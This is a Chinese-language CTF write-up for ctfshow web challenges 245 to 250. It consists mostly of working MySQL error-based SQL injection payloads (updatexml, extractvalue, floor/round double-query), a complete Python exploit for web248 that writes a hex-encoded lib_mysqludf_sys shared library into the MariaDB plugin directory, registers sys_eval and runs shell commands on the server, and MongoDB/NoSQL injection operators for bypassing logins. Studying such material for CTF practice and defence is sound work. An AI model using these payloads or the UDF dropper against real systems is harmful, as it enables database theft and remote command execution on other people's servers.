?id=1' or updatexml(1,concat(0x7e,(select right(flag,32) from ctfshow_flag),0x7e),1)+--+

extractvalue:
?id=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))+--+

?id=1' or extractvalue(1,concat(0x7e,substr((select group_concat(flag1) from ctfshow_flagsa),20,30),0x7e))+--+

web246——floor报错注入

**floor报错注入:**主要利用主键的重复来实现报错

?id=1' union select 1,count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2))b from information_schema.tables group by b-- -

?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1), 0x7e,floor(rand(0)*2))b from information_schema.tables group by b -- -

?id=1' union select 1,count(*),concat(0x7e,(select flag2 from ctfshow_flags),0x7e,floor(rand(0)*2))b from information_schema.tables group by b-- -

web247——双查询错误注入、报错注入

floor():向下取整
ceil():向上取整
round():四舍五入

floor替换成其他取整函数即可

?id=1' union select 1,count(*),concat((select `flag?` from ctfshow_flagsa ), 0x7e,round(rand(0)*2))b from information_schema.tables group by b -- -

web248——UDF注入

udf:用户自定义的函数

/api/?id=1'; select @@plugin_dir; -- -
查出Mysql插件路径:/usr/lib/mariadb/plugin/

/api/?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+
引入udf.so文件从而创建函数sys_eval

exp提权:

import requests

base_url="http://3f801e10-5c58-42bf-a5cf-8a588d3bfe9c.challenge.ctf.show:8080/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0,21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t) #UDF提权一般配合dumpfile 而不是outfile
    r = requests.get(url)
    print(r.status_code)

next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'-- +&page=1&limit=10" #将各个txt文件合并到udf.so
rn = requests.get(next_url)

uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"#创建udf函数
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');-- +&page=1&limit=10"#执行命令并查看
rnn = requests.get(nn_url)
print(rnn.text)

web249——NOSQL注入

参考文章:
NoSQL注入小笔记
冷门知识 — NoSQL注入知多少

搜一下Memcache::get
说传递数组即会返回第一个数组得元素

/api/?id[]=flag

web250

//sql语句
  $query = new MongoDB\Driver\Query($data);
  $cursor = $manager->executeQuery('ctfshow.ctfshow_user', $query)->toArray();
 //返回逻辑,无过滤
  if(count($cursor)>0){
    $ret['msg']='登陆成功';
    array_push($ret['data'], $flag);
  }  

NoSQL注入小笔记
冷门知识 — NoSQL注入知多少
MongoDB是NOSQL的一种,介绍一下Mongodb得两个操作符:
$ne:!= 不等于
$regex:正则匹配

username[$ne]=1&password[$ne]=1
username[$regex]=.&password[$regex]=.

你可能感兴趣的:(ctfshow,mysql)